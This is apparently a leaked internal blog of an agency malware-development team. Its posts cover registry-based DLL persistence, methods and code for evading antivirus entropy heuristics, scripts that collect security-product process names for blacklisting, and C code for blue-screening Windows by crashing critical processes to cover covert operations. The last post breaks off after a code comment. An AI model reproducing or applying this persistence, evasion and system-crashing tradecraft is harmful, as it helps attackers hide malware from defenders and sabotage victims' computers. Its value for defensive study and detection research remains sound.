Thursday, June 1, 2017

AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key? (link - https://wikileaks.org/ciav7p1/cms/space_3276809.html)



Owner: User #71473


Pages: HammerDrill (SECRET)


Blog posts:

  • [User #71473]: Huh. It works.
    So, that whole
    [BLOGPOST] content-title="AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key?" posting-day="2016/02/18"
    thing I posted a little while ago?  Just tested it on Windows 10.  It works.
    On Windows 10 (and, apparently, Windows 7 and up), there's a second value in the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows that needs to be set in addition to AppInit_DLLs -- LoadAppInit_DLLs. This is a REG_DWORD, and setting it to 1 enables the loading of the DLLs specified in the other value.  Oh, by the way, the list of DLLs in the AppInit_DLLs value is space or comma delimited – I was expecting semicolon delimited, but MSDN says otherwise.
    Speaking of MSDN, a page entitled "AppInit_DLLs in Windows 7 and Server 2008 R2" has some interesting tidbits that seemed to indicate a move towards requiring code signing of the DLLs at some point in the future.  Specifically, they mention a 3rd value, RequireSignedAppInit_DLLs, that when set to 1 means only signed DLLs will be loaded.  They go on to say that for compatibility purposes, Windows 7 shipped with this disabled, while Server 2008 shipped with this enabled.  Flip forward all the way to Windows 10 (over 7 years later), and this value isn't even defined by default.  I think maybe I'll write something that checks for these values and run it against the DART VMs to see what happened to that key across versions.
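    In the meantime, here's a minimal sketch of what that check might look like -- plain Win32 registry calls, a hypothetical helper name, and minimal error handling (a 64-bit build would also want a second pass over the Wow6432Node copy of the key):

    #include <windows.h>
    #include <stdio.h>

    // Dump the AppInit-related values from HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
    void DumpAppInitValues(void)
    {
        HKEY hKey = NULL;
        const wchar_t *szKeyPath = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows";

        if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, szKeyPath, 0, KEY_QUERY_VALUE, &hKey) != ERROR_SUCCESS)
        {
            wprintf(L"Could not open %ls\n", szKeyPath);
            return;
        }

        wchar_t szDlls[1024] = { 0 };
        DWORD cbDlls = sizeof(szDlls) - sizeof(wchar_t);
        DWORD dwLoad = 0, cbLoad = sizeof(dwLoad);
        DWORD dwSigned = 0, cbSigned = sizeof(dwSigned);

        // REG_SZ list of DLLs to load (space or comma delimited per MSDN)
        if (RegQueryValueExW(hKey, L"AppInit_DLLs", NULL, NULL, (LPBYTE)szDlls, &cbDlls) == ERROR_SUCCESS)
            wprintf(L"AppInit_DLLs              = %ls\n", szDlls);

        // REG_DWORD: 1 enables loading of the listed DLLs (Windows 7 and up)
        if (RegQueryValueExW(hKey, L"LoadAppInit_DLLs", NULL, NULL, (LPBYTE)&dwLoad, &cbLoad) == ERROR_SUCCESS)
            wprintf(L"LoadAppInit_DLLs          = %lu\n", dwLoad);

        // REG_DWORD: 1 means only signed DLLs get loaded -- not defined by default on Windows 10
        if (RegQueryValueExW(hKey, L"RequireSignedAppInit_DLLs", NULL, NULL, (LPBYTE)&dwSigned, &cbSigned) == ERROR_SUCCESS)
            wprintf(L"RequireSignedAppInit_DLLs = %lu\n", dwSigned);
        else
            wprintf(L"RequireSignedAppInit_DLLs is not defined\n");

        RegCloseKey(hKey);
    }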

    Slight Tangent:
    I found some vague hints that the RequireSignedAppInit_DLLs might not even do anything on Windows 10 and that unsigned DLLs work regardless of how that is set.  However, SecureBoot apparently does block the DLLs from loading, so maybe they have moved away from a specific code signing check for this key and are relying on secure boot being enabled.  (Incidentally, these hints came from a thread of people hacking Windows 8, 8.1 and 10 to use the Aero window style from Vista/Win 7.  They appear to be using the AppInit key to get their DLLs loaded into every process, which in turn causes the GUI apps to use old style controls to render their windows.  This amuses me)

    Happy reg hacking!

    #getoffMyLawn #pleaseWindowsLoadTheseDLLsISwearTheyAreNotMalware
  • [User #71473]: Weird little behavior in Windows
    This is a silly observation, but it amused me, so I will share.
    If you map a network drive (say, U:\) and then try to copy a file from the mapped share to a location on your local system that requires admin creds to access, the copy will fail complaining it can't access U:\
    This is (most likely) because your mappings are not shared between your admin and non-admin tokens.  Type net use into a normal command prompt and then do the same in an elevated command prompt to witness the awful truth.
    If you *really* want those shares to show up for both tokens, you can map them from the elevated command prompt.
    net use U: \\fs-01\home /PERSISTENT:YES
    This should make it so that you have your U: drive when you are running as admin.

    Happy share mapping

    #getOffMyLawn #splitTokensHaveSomeInterestingSideEffects
  • [User #71473]: AppInit_DLLs regkey == Cheap persistence technique that isn't a Run key?
    I was poking around the web trying to figure out why a DLL I was memloading into a process would sometimes crash when creating a Window.  I found some interesting things when delving down that rabbit hole, including a post by User #76981 that seemed to describe the kind of bad behavior I was seeing related to leaking a Window Class.  He kept referencing windows created with the CS_GLOBALCLASS class style, which makes your window class available to all modules in the current process.  I wasn't using this style, but curiosity about how it worked led me to MSDN, where I read the following:
    "To create a class that can be used in every process, create the window class in a .dll and load the .dll into every process.  To load the .dll in every process, add its name to the AppInit_DLLs value in the following registry key:

    HKEY
    _LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

    Now, I don't know about you, but I'd never heard of this key before.  I'm curious – has anyone seen this used for persistence before, is it something that PSPs freak out about, and are there any gotchas to using this?  If nobody knows, at some point I'll write up some proof of concept code and give it a whirl to see if a) it works and b) the PSPs give it any grief.
    If nothing else, if it turns out it kinda sucks, but there are at least some cruddy PSPs that let it slide, it might be viable for Liaison tools that need something that isn't what we use in unilateral stuff.
  • [User #71473]: The Bug that isn't, except when it is (MSDN Lies)
    I ran into a bug in some post processor code that only manifested on Windows 7, but not Windows 8+.  This was... odd. 
    The post processor code in question is very, very simple, and works reliably on Windows 10, where I did all of my original testing and debugging.  On Windows 7, the code crashes consistently, but after processing the first chunk of data.  Usually, OS incompatibility is a bit more all or nothing – if you use a feature that isn't present on an older OS without dynamically loading the function, you crash immediately, not 2 pages of code later at the bottom of the main processing loop.
    So I fired up Visual Studio on a Win 7 VM and stepped into the code.  The offending line is this:
    WriteFile(writeFile, uBuff.m_pBufferAddr, writeSize, 0, NULL);
    When I finally looked closely at the line (and not just at the first few parameters), I recognized a classic rookie mistake – the "optional" lpNumberOfBytesWritten parameter is only optional when lpOverlapped is not NULL.  I've read that text in MSDN dozens of times and corrected this bug in new developers' code dozens more.  How did I miss this?  More importantly, how did this work in Windows 8+?  This code should always crash – WriteFile sets *lpNumberOfBytesWritten = 0 at the beginning of the function.
    It appears Microsoft has altered the behavior of WriteFile.  For good or for ill, this optional parameter appears to now be truly optional, not just conditionally optional.  The MSDN docs, however, do not reflect this change in behavior.
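    For the record, the portable fix is just to hand WriteFile a real DWORD even if you never look at it.  A minimal corrected version of the same call:

    DWORD dwBytesWritten = 0;
    // lpNumberOfBytesWritten is only optional when lpOverlapped is non-NULL, so for a
    // synchronous write always pass a real pointer -- this keeps Windows 7 happy too.
    WriteFile(writeFile, uBuff.m_pBufferAddr, writeSize, &dwBytesWritten, NULL);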
    tl;dr – this works now, but don't do this or it will break backwards compatibility

  • [User #71473]: Entropy-based Heuristics in PSPs (and how to defeat them)
    I mentioned in a
    [BLOGPOST] content-title="A Few Observations on Cryptography, Compression and Randomness" posting-day="2015/06/09"
     the basic theory behind information entropy and how it is used by some PSPs to heuristically flag binaries as Trojans.  Today I'll go into the PSPs with which I have personally bashed heads over this type of detection, how we defeated or worked around the issue, and then some general techniques to try to identify entropy-based heuristics and attempt to evade them.
    The first PSP where we (OSB) encountered entropy-based checks was Avira.  A large portion of our work at the time (2010-2012) consisted of QRCs to develop Trojans and installation wrappers for other tools and implants.  When trojaning an overt binary with a malicious payload, our most common techniques all revolved around compressing and encrypting an overt and covert binary into a wrapper that was built as a look-alike of the overt program in terms of size, icons, timestamps, etc.  Doing this typically results in a very small installer binary (75K or less was common) that is then packed with two or more other binaries that are typically much larger.  The result is a binary that has a very high proportion (75% or more, typically) of compressed and encrypted data – data that is, of course, high entropy.  The high entropy data was usually stored in one of 3 places: the .rsrc section (Raptor), the .data section (Melomy) or appended to the end of the binary (Ferret).
    Once the payloads were packed into the binary, Avira routinely caught the tools and would pop a box with reference to some variant of a Trojan.Win32 heuristic signature.  One of the senior OSB developers at the time noted that self-extracting archives were very similar in their nature to the types of Trojans we produced, yet were never flagged as malicious by Avira.  Armed with this observation, the dev attempted to mimic a RAR self extractor in various ways and eventually discovered that including the RAR signature ("RAR!" or hex 52 41 52 21) and a small amount of random data anywhere in the compiled binary was enough to defeat Avira's heuristic detection.
    We later unexpectedly ran afoul of Avira again with a tool written by User #4849738 when he was a co-op in RDB.  The tool in question was a network survey tool that didn't contain any payloads but was still tripping a Trojan.Win32 heuristic signature.  Even stranger, the tool did not flag when it was built with OpenSSL for its encryption library rather than the Microsoft Crypto API.  The most noticeable difference between the two versions was the filesize of the binary – when built with the MSCrypto library the binary was roughly 80K, while the OpenSSL version was around 300K.  I was helping investigate the issue when I ran a simple visualization tool against the binaries and discovered that both had significant areas in their data sections that contained high entropy data, and that the areas were identical.  I realized that these were likely cryptographic constants (S-boxes, most likely) that were shared by the libraries due to being defined in the underlying algorithms.  The only difference was that the proportion of high entropy data in the MSCrypto version of the tool was much higher thanks to the smaller file size – the constants were 12K out of ~80K, or ~15%.  By contrast, the 12K constants were less than 4% of the OpenSSL binary.  I began experimenting by padding the MSCrypto library with different amounts of data until Avira stopped flagging the binary, and found that Avira seemed to be tripping the signature at the 5% User #76980.  Unlike previous detections, this was clearly a false positive, as the tool was in no way a Trojan.  We also discovered that by not linking against crypt32.lib but instead loading crypt32.dll at run time, we could avoid having those crypto constants directly linked into the code.
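    For anyone wanting to do the same, a rough sketch of the run-time loading approach follows.  The wrapper function and its use of CryptProtectData are purely illustrative (not the survey tool's actual code); the point is that nothing from crypt32.lib gets statically linked into the binary:

    #include <windows.h>
    #include <dpapi.h>

    // Function-pointer type matching CryptProtectData so we never reference the import directly.
    typedef BOOL (WINAPI *CryptProtectData_t)(DATA_BLOB*, LPCWSTR, DATA_BLOB*, PVOID,
                                              CRYPTPROTECT_PROMPTSTRUCT*, DWORD, DATA_BLOB*);

    BOOL ProtectBlob(DATA_BLOB *pIn, DATA_BLOB *pOut)
    {
        // Resolve the DLL and the export at run time instead of linking against crypt32.lib
        HMODULE hCrypt32 = LoadLibraryW(L"crypt32.dll");
        if (hCrypt32 == NULL)
            return FALSE;

        CryptProtectData_t pfnProtect =
            (CryptProtectData_t)GetProcAddress(hCrypt32, "CryptProtectData");
        if (pfnProtect == NULL)
        {
            FreeLibrary(hCrypt32);
            return FALSE;
        }

        BOOL bOk = pfnProtect(pIn, NULL, NULL, NULL, NULL, 0, pOut);
        FreeLibrary(hCrypt32);
        return bOk;
    }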
    It became standard practice to include the RAR! defeat in our Trojans, so much so that we included a function in most of our builders that would automagically add the defeat after packing the payloads into the wrapper.  Avira Entropy Defeat includes the source code for AddAviraDefeat().  We later discovered that F-Secure was also triggering on high-entropy binaries but was unfortunately immune to the RAR! defeat.  Instead, resource cloning of a self extracting RAR string table proved effective.  Unfortunately, the string table defeat caused Avira to flag binaries even when they contained the RAR! defeat.  We discovered that cloning the manifest of a RAR SFX binary defeated both PSPs simultaneously.  F-Secure Entropy Defeat details the manifest that needs to be included.
    The final annoying entropy-based detection we ran into was Bitdefender.  Bitdefender only flagged high entropy resources, so Ferret's and Melomy's seemed to be immune.  Fortunately, Bitdefender's heuristic was rather lame in that it completely ignored resources that were not RC_DATA.  Bitdefender Resource Defeat  details the rather simple defeat.
    Based on these experiences, there's a set of tasks that you can use to triage a Trojan.Win32 type detection to see if you are running afoul of an entropy based heuristic:
    1. Scan the binary without including the payloads.
    2. If the scan passes, include the payloads with no compression or encryption.
    3. If the scan passes, then you have likely run afoul of entropy-based checks.
    Things to try if you are confident you are being caught due to entropy:
    • Pad the binary with a large amount of low-entropy dummy data (zero padding works well but is suspicious looking.  Low-color bitmaps work well and actually add some cover; see the sketch after this list)
    • If storing the data as a resource, change the resource type
    • Change how the data is stored – move compiled in payloads to a resource and vice versa
    • Use obfuscation instead of encryption/compression
    • Encode the encrypted data (base-64, hex, URL-encode, etc.) to lower the entropy
    • Store the data in an external file (resource only DLL, .dat file)
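    As a quick illustration of the padding option mentioned above, a sketch that appends a block of low-entropy filler to an already-built binary (the path and pad size are placeholders; data appended past the end of a PE image lands in the overlay and is ignored by the loader):

    #include <stdio.h>

    // Append low-entropy dummy data so the packed payload makes up a smaller share of the file.
    int PadWithLowEntropyData(const char *path, size_t padBytes)
    {
        FILE *f = fopen(path, "ab");
        if (f == NULL)
            return -1;

        // A short repeating pattern keeps the entropy of the padding very low
        // without being a solid (and suspicious-looking) run of zeros.
        const unsigned char pattern[4] = { 'P', 'A', 'D', ' ' };
        for (size_t i = 0; i < padBytes; i++)
            fputc(pattern[i % sizeof(pattern)], f);

        fclose(f);
        return 0;
    }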
    Happy PSP Evasion! 

  • [User #71473]: PSP Process Lists have been updated
    Clicketh PSP Process Names from DART to findeth yon lists.
  • [User #71473]: New PSP Process Lists from DART are available
    You can find the current list at PSP Process Names from DART 
    Also, a shameless plug for my blog post on entropy and its use by PSPs as a (terribad) heuristic
    [BLOGPOST] content-title="A Few Observations on Cryptography, Compression and Randomness" posting-day="2015/06/09"
  • [User #71473]: A Few Observations on Cryptography, Compression and Randomness
    For folks working in clandestine software, Cryptography is a critical piece of our tradecraft.  Proper application of cryptographic techniques is critical to protecting the data at rest, data in transit and the tools themselves.  Cryptography can be a double-edged sword when it comes to PSP evasion – hiding certain portions of your code with cryptographic techniques may allow you to evade detection, but some PSPs will actually flag your tool simply for "looking encrypted".  In addition, the crypto code in your tool is often one of the most signaturable aspects of the tool – most block ciphers have large blocks of constant binary data (particularly s-boxes) that can be used to quickly identify not only the presence of cryptographic code but also the specific algorithm being used.  Add in the various nuances in how different implementations choose to represent that data and you can get a fairly specific signature that can often be hard to minimize.
    Knowing that PSPs are wary of crypto to varying degrees and with varying levels of sophistication, there are some useful things in the field of information theory to be aware of when trying to obfuscate cryptographic code and encrypted data.  The following concepts are key to understanding how a PSP or malware analyst goes about looking for your crypto.

    Entropy (Shannon Entropy)
    "In Information Theory, entropy is the expected value of the information contained in each message received.  Here, message stands for an event, sample or character drawn from a distribution or data stream." – Wikipedia entry "Entropy (intofmation theory).
    The above quote may seem like a bit of a headscratcher at first.  What exactly is the "expected value of the information"?  In Information Theory, the value of information is determined by how likely (or rather, how unlikely) a given event is to occur.  If the value of an event is extremely predictable because there are few values to choose from or the distribution of values is highly skewed, then each event has very low information.
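    Concretely, the entropy of a byte-valued sample is H = -Σ p(i) * log2(p(i)), summed over the 256 possible byte values, where p(i) is the observed frequency of value i – a rare value contributes many bits of information, a dominant one contributes almost none.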
    Entropy is expressed in terms of bits of entropy – the maximum number of bits of entropy for a given data sample is based on the number of bits necessary to represent all possible values.  For byte values, the maximum possible entropy is 8, as it takes 8 bits to represent all 256 possible values.  Calculating entropy is relatively straightforward:

    #include <math.h>

    // Shannon entropy, in bits per byte, of a raw buffer
    float getEntropy(unsigned char *data, unsigned int dataSize)
    {
        float entropy = 0.0;
        unsigned int counts[256] = { 0 };

        // histogram of byte values
        for (unsigned int i = 0; i < dataSize; i++)
        {
            counts[data[i]]++;
        }

        float p = 0.0;
        for (int i = 0; i < 256; i++)
        {
            if (counts[i] != 0)
            {
                p = ((float)counts[i] / (float)dataSize);
                if (p > 0)
                {
                    entropy = entropy - p * (log(p) / log(2.0));
                }
            }
        }

        return entropy;
    }

    It is important to understand that entropy is a measure of how well distributed a sample space is.  A file containing every possible value in exactly the same proportion will have perfect entropy.  Entropy is *not* a measure of randomness and in and of itself it is a poor test for randomness, although random data will have high (but not perfect) entropy.  Compressed data is high entropy because compression algorithms strive to make every bit of information meaningful by eliminating redundancy and reducing values to the fewest number of bits necessary to represent them.  In fact, some compression algorithms use entropy as part of their procedures for encoding data.
    Entropy is used by some PSPs as a heuristic to determine if a binary has been trojaned.  Avira has been observed to flag binaries that contain "large" amounts of high entropy data – somewhere between 5-10% of the binary.  This happens to be a horrendous heuristic when it comes to false positives, and as a result, Avira also has some logic that allows "known good" binaries a pass (i.e., self extracting RAR files).  Similar entropy based heuristics have been observed with F-Secure and Bitdefender as well.
    Bear in mind that if you encrypt or compress data within a binary, you are likely to run afoul of an entropy-based heuristic.  How likely this is to happen depends on how large the encrypted/compressed section is relative to the overall size of the binary.  For small binaries, highly entropic constants used in encryption libraries can be enough to trip these heuristics – Avira once flagged a collection tool with no encrypted data simply because linking against the standard Windows crypto libraries statically pulled two large sections of high entropy cryptographic constants into the binary.
    Avoiding heuristics like these will depend on the individual PSP.  Due to the high likelihood of false positives, many PSPs have checks on other aspects of the files (resources, magic numbers) to determine if they appear to be legitimate high entropy binaries such as self extractors.  Avira looks for the RAR! magic number to identify self extracting RAR files, while F-Secure looks for string table entries in the resource section that are commonly associated with the self extractor portion of a RAR self extractor.  Avoiding heuristics such as these generically can also be accomplished by encoding the data (hex, base-64, etc.) or "greening" the data (encoding the data in such a way as to make the entropy match that of a target data sample.)
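    To make the encoding idea concrete, here is a minimal sketch (not tied to any particular builder): hex-encoding an encrypted blob means the output only ever contains 16 distinct byte values, so its entropy tops out around 4 bits per byte – at the cost of doubling the size of the data.

    #include <stdio.h>
    #include <stdlib.h>

    // Hex-encode a buffer.  The caller owns (and must free) the returned string.
    char *HexEncode(const unsigned char *data, size_t len)
    {
        static const char digits[] = "0123456789ABCDEF";
        char *out = (char *)malloc(len * 2 + 1);
        if (out == NULL)
            return NULL;

        for (size_t i = 0; i < len; i++)
        {
            out[i * 2]     = digits[data[i] >> 4];
            out[i * 2 + 1] = digits[data[i] & 0x0F];
        }
        out[len * 2] = '\0';
        return out;
    }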
    There are better statistical tests for determining randomness than entropy.  I'll talk about a few in a future post.  Stay tuned!



  • [User #71473]: Culling PSP Process Names via the Power of DART, Part 2.
    Back in March, I posted about some work I was doing to automatically gather a list of PSP processes by diffing a list of baseline processes against a dynamically generated process list across multiple DART VMs.  I recently finished up refining things a bit more so that a test plan can be run that gathers PSP process lists from all available Windows VMs on DART.  The goal is to be able to run this periodically, post process the data into a nice format and then populate the various PSP pages with process lists so that we have reasonably up-to-date information on processes to blacklist against.
    The script is now setup to dump its output into the resources folder with a filename generated from the VM attributes.  This gives us a single folder on dart-ts-01 we can collect the data from for processing.

    import tybase.undermine.leaf as leaf
    import tybase.undermine.meta.leafi as leafi

    _tasklist_path = 'c:\\windows\\system32\\tasklist.exe /NH /FO CSV'
    _baseline_path = 'media/SimpleTest/resources/baseline.txt'
    _output_path = 'media/SimpleTest/resources/'

    @leafi.MainLeaf()
    @leafi.DefineProcessor()
    class UnitTest(leaf.Leaf):
        def run(self):
            self.log.info( 'started' )
            diff = lambda l1, l2: [x for x in l1 if x not in l2]
            baseline_file = open(_baseline_path, "r")
            baselineText = baseline_file.read()
            baselineText = baselineText.upper()
            baseline_file.close()
            baselineList = baselineText.split('\n')
            for h in self.hosts:
                if not h.service_ping():
                    return self.FAILURE, 'failure'
                os_name = get_details_string(h.host)
                outputFileName = _output_path + 'Results_' + os_name
                outputFile = open(outputFileName, "w")
                os_info = get_details(h.host)
                outputFile.write("OS Family: %s\r\n" % os_info['family'])
                outputFile.write("OS Type:   %s\r\n" % os_info['os'])
                outputFile.write("OS SP:     %s\r\n" % os_info['ossp'])
                outputFile.write("OS Lang:   %s\r\n" % os_info['lang'])
                outputFile.write("OS Arch:   %s\r\n" % os_info['arch'])
                outputFile.write("PSP:       %s\r\n" % os_info['apps'])
                outputFile.write("---------------------------------\r\n")
                tasks = h.execcmd( _tasklist_path, wait=True, shell=True )
                lines = tasks.split('\n')
                procNames = []
                for line in lines:
                    fields = line.split(',')
                    name = fields[0]
                    name = name.upper()
                    procNames.append(name)
                myDiff = diff(procNames, baselineList)
                #myDiff = diff(baselineList, procNames)
                myDiff = list(set(myDiff))
                for name in myDiff:
                    if (name != '\r'):
                        outputFile.write("%s\r\n" % name)
                outputFile.write("\r\n\r\n")
                outputFile.close()
            return self.SUCCESS, 'success'


    def get_details(host_ip):
        import json
        import os
        cmd = './media/tyworkflow/bin/db_admin -j list_resources ' \
              'with_header=True filter_by=ip="%s" select=family,os,ossp,lang,arch,apps' % host_ip
        x = os.popen(cmd)
        data = x.read()
        x.close()
        data_list = json.loads(data)
        my_dict = dict(zip(data_list[0], data_list[1]))
        if my_dict['apps'] in [ '-', '', 'adobe', 'adobereader' ]:
            my_dict['apps'] = 'nopsp'
        return my_dict


    def get_details_string(host_ip):
        my_dict = get_details(host_ip)
        return_string = '%s_%s_%s_%s_%s_%s' % (my_dict['family'],
                                               my_dict['os'],
                                               my_dict['ossp'],
                                               my_dict['lang'],
                                               my_dict['arch'],
                                               my_dict['apps'])
        return return_string

    The baseline.txt file is a work in progress but is being updated as additional non-psp processes are discovered in the results.


  • [User #71473]: So you wanna make windows BSOD from user space? (Observations On Taking Down Critical Windows Processes Part II)
    SECRET//NOFORN

    I talked about this a bit back in
    [BLOGPOST] content-title="Observations On Taking Down Critical Windows Processes" posting-day="2015/02/12"
    , but I'd like to revisit this with additional info.
    I develop on Windows.  You might think I hate BSODs.  But this is not true... I love BSODs.  BSODs make me chuckle, especially when I cause them to happen.  Even more so when I cause them to happen deliberately.  Unfortunately, there are vanishingly few requirements where BSODs are desirable.  In fact, BSODing a system is generally frowned upon in this establishment.
    So my little pet project (yay, iTime!) to terminate processes by any means necessary didn't seem like it was likely to be usable in any real tool.  However, I have since had two possible we're-not-kidding-this-is-for-realz opportunities to use this stuff.  The first scenario is that you may be running a tool that is messing with a user's software (say, something recording from the webcam).  We have a project like this in OSB for a PAG customer that is all kinds of awesome.  For most cases, the tool can suspend the recording software, corrupt data, and then resume the process once the PAG officers have beat feet.  Unfortunately, one of the common webcam monitoring applications that PAG runs across is a little unstable and the developers deliver it with a watchdog process that restarts the software if it appears to go non-responsive.  We could, of course, suspend the watchdog process too, but this puts application specific behavior into a tool that is supposed to be application agnostic.
    I recommended a solution that is basically a bigger, more aggressive watchdog – it watches for new, non-SYSTEM processes to start up (I allow anything in the NTAUTHORITY group to start for good measure) and immediately kills them.  It was awesome.  It also, surprisingly, was able to kill 32-bit processes from a 64-bit process using CreateRemoteThread, which I didn't think was actually possible.  So here we have a process basically acting all Gandalf on the system and going "You Shall Not Pass!".  Plenty cool and stuff – might get used, might not, but it's ready to go if the dev decides there isn't a more elegant solution.
    The same tool previously had an optional bluescreen capability as a way of taking the box down without an obvious shutdown.  However, that capability used a driver (custom driver in 32-bit, signed 64-bit driver from a 3rd party app with an exploitable call for 64-bit).  Unfortunately, there's a bit of an on-disk signature there since the driver requires a service installed to fire it up, if only long enough to bluescreen.  The problem is, of course, it's hard to clean up that registry residue when the box is, ya know, off.  So the dev for the new version was all like "Hey man, is there a way to blue screen from user mode?" and I was all like "Totally!"  I even had code that could do it with a bit of tweaking.  Bro is all "Sweet, I just Bluescreened my Win 7 box" and I was all "Hot diggedy smack!  Hey, you want me to figure out which processes to trash for other flavors of Windows?"
    So this is the result of my research into taking down various flavors of Windows:
    • Windows XP 32-bit: Crash csrss.exe
    • Windows 7 64-bit: Crash wininit.exe or csrss.exe
    • Windows 8 32-bit: Crash csrss.exe, smss.exe or wininit.exe
    • Windows 8.1 64-bit: Crash csrss.exe or wininit.exe
    • Windows 10 64-bit: See below
    So, as you can see, most versions of Windows tested share csrss.exe as the common process that can immediately BSOD the box.  wininit.exe doesn't exist on XP.  smss.exe can be opened on XP, but I haven't been able to crash it yet.  Windows 10... is special.
    On Windows 10, you cannot even open the majority of SYSTEM processes.  wininit.exe, smss.exe and csrss.exe are all untouchable.  However, you can open and terminate or crash all svchost.exe processes.  Doing this repeatedly for long enough eventually gets you the coveted 0xc000021a stop code that seems to mean the kernel is so flabbergasted at all the carnage on the system that it has abandoned all hope and marched itself directly to the underworld.  This takes roughly 30 seconds or so and about 3-4 rounds of automatic restarts of svchost.exe processes.
    Further testing is needed for server OSes as well as Vista and Win 7 32-bit, but it looks like we have full coverage across the various flavors if we just target csrss.exe and, if that fails, a massive assault on all things svchost-y.
    Note: Crashing these processes was done in one of two ways: Calling an API function with a bogus pointer value (0xFFFFFFFF and its 64-bit analog seem to work nicely) via CreateRemoteThread or injecting code to divide by zero.  Both seem to work equally well.  APIs that seem to crash nicely are printf_s from msvcrt, CharUpperA from user32, LoadLibraryA from kernel32.
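    For reference, a minimal sketch of the bogus-pointer variant (hProcess is assumed to be open with the usual CreateRemoteThread access rights; kernel32 loads at the same base in every process of the same bitness, so the local address of LoadLibraryA is valid in the target):

    #include <windows.h>

    BOOL CrashProcessWithBogusPointer(HANDLE hProcess)
    {
        // LoadLibraryA will try to read a string at whatever address we hand it...
        LPTHREAD_START_ROUTINE pfnStart = (LPTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryA");
        if (pfnStart == NULL)
            return FALSE;

        // ...and this address is guaranteed to be invalid (0xFFFFFFFF / 0xFFFFFFFFFFFFFFFF).
        LPVOID pBogus = (LPVOID)(ULONG_PTR)-1;

        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnStart, pBogus, 0, NULL);
        if (hThread == NULL)
            return FALSE;

        CloseHandle(hThread);
        return TRUE;
    }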

    #dieWindows10YouGravySuckingPigDog
    #killItWithFire
    #youShallNotPass

    SECRET//NOFORN
  • [User #71473]: Culling PSP Process Names via the Power of DART
    When rolling out some hair on fire QRC, we occasionally run into issues with blacklisting PSPs due to variances in process names on various OS versions, OS bitnesses, PSP bitnesses, and even "flavor" of the PSP (i.e., Enterprise, Antivirus, Internet Security and Free vs. Pay editions).  There was at one time a mythical table of PSP process names that I believe we originally got from IV&V, but over time things change and what was once comprehensive is now dated, incomplete and even outright incorrect.
    With DART, we have a pretty wide breadth of PSPs that get updated routinely, so it should be easy to automatically cull a list of process names across multiple OS/PSP combos.  I have the beginnings of a DART script that will collect a process list from each VM.  The end goal is to setup a Bamboo build that will run the test plan periodically.
    The basic script looks like so...
    import tybase.undermine.leaf as leaf
    import tybase.undermine.meta.leafi as leafi

    # Location of the baseline text file -- this is an evolving list of processes that are normally or
    # at least frequently found running on DART VMs that are non-PSP related
    _baseline_path = 'leafbags/SimpleTest/simple_tests/baseline.txt'

    # Path and command line switches to tasklist executable on the target VM -- for ease of parsing
    # we want no header and a CSV formatted list
    _tasklist_path = 'c:\\windows\\system32\\tasklist.exe /NH /FO CSV'

    @leafi.MainLeaf()
    @leafi.DefineProcessor()
    class UnitTest(leaf.Leaf):
        def run(self):
            self.log.info( 'started' )

            # diff two lists with a single line lambda -- yes, it's voodoo magic
            diff = lambda l1, l2: [x for x in l1 if x not in l2]

            # get and parse the baseline file as a list
            baseline_file = open(_baseline_path, "r")
            baselineText = baseline_file.read()
            baseline_file.close()
            baselineList = baselineText.split('\n')

            # make sure we are able to connect to the host then grab and diff the tasklist
            for h in self.hosts:
                if not h.service_ping():
                    return self.FAILURE, 'failure'
                tasks = h.execcmd( _tasklist_path, wait=True, shell=True )
                lines = tasks.split('\n')
                procNames = []
                for line in lines:
                    # separate the CSV line into fields -- we just want the name, which is the first field
                    fields = line.split(',')
                    procNames.append(fields[0])
                # this produces a list that only contains names not found in the baselineList
                myDiff = diff(procNames, baselineList)
                print myDiff
            return self.SUCCESS, 'success'

    The baseline list for a Win7 64 VM looks like so:
    "System Idle Process" "System" "smss.exe" "wininit.exe" "csrss.exe" "winlogon.exe" "services.exe" "lsass.exe" "lsm.exe" "svchost.exe" "spoolsv.exe" "pythonw.exe" "vmtoolsd.exe" "taskhost.exe" "sppsvc.exe" "dllhost.exe" "msdtc.exe" "dwm.exe" "explorer.exe" "pythonw.exe" "SearchIndexer.exe" "slui.exe" "WmiPrvSE.exe" "cmd.exe" "conhost.exe" "tasklist.exe" "wmpnetwk.exe" "dinotify.exe" "wuauclt.exe" "taskmgr.exe" "WMIADAP.exe" "SearchProtocolHost.exe" "SearchFilterHost.exe" "VSSVC.exe"

    Stay tuned for when I actually get this working with a test plan


  • [User #71473]: Timing Issues and DART
    I've spent quite a bit of time debugging unit tests recently where everything seemed to be working just fine until I started running the UnitTests via DART.  While I found legitimate bugs in both the tests and the units under test via DART thanks to the coverage across multiple OSes, I also found lots of sporadic failures that I was unable to reproduce when reserving the same VM and running the test directly.  Multiple runs of the same test plan produced failures in different tests on different VMs.  Non-reproducible errors are bad.
    When I run into errors like this, I always suspect timing issues (race conditions in particular) and my old-school, inelegant technique for testing this suspicion is to throw some big old sleeps into the code and see if things magically fix themselves.  In my particular case, I was testing Payload Deployment components that started additional processes and/or threads and Privilege Escalation/UAC Bypass techniques that do the same under the covers.  My suspicion was that there was a tiny delay between starting these new processes and threads and the results of these threads actually being produced. 
    In some cases, the components in question return thread handles or other waitable objects.  I added Waits as appropriate and some of the issues went away.  However, I occasionally ran into issues where the threads were taking significantly longer to finish than I expected.  What I thought was a healthy 10 second timeout on the wait call was sometimes insufficient, so I had to up these timeouts.  Additionally, since some of the components in question can't make thread handles or other waitable objects available to the caller, I was forced to introduce Sleeps to try to mitigate remaining timing issues.
    One thing to note is that the DART hardware is pretty busy these days.  Running dozens of VMs concurrently can slow individual VMs to a crawl, and sometimes tests that should take a matter of seconds can take minutes.  I erred on the side of caution with my Sleeps and Waits, allowing timeouts of up to 4 minutes on WaitForSingleObject calls and introducing Sleeps of up to 30 seconds in areas of the code where noticeable delays were expected.  Still, it is worth noting that the current resource constraints of the DART hardware can be a blessing in disguise, as it is much easier to find timing issues when there is a large pool of potentially quite slow VMs to bang against.
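    For what it's worth, the adjusted waits ended up looking roughly like this (hWorkerThread stands in for whatever waitable handle the component under test returns):

    // Components that hand back a waitable object get a generous wait --
    // a loaded DART VM can turn a seconds-long operation into minutes.
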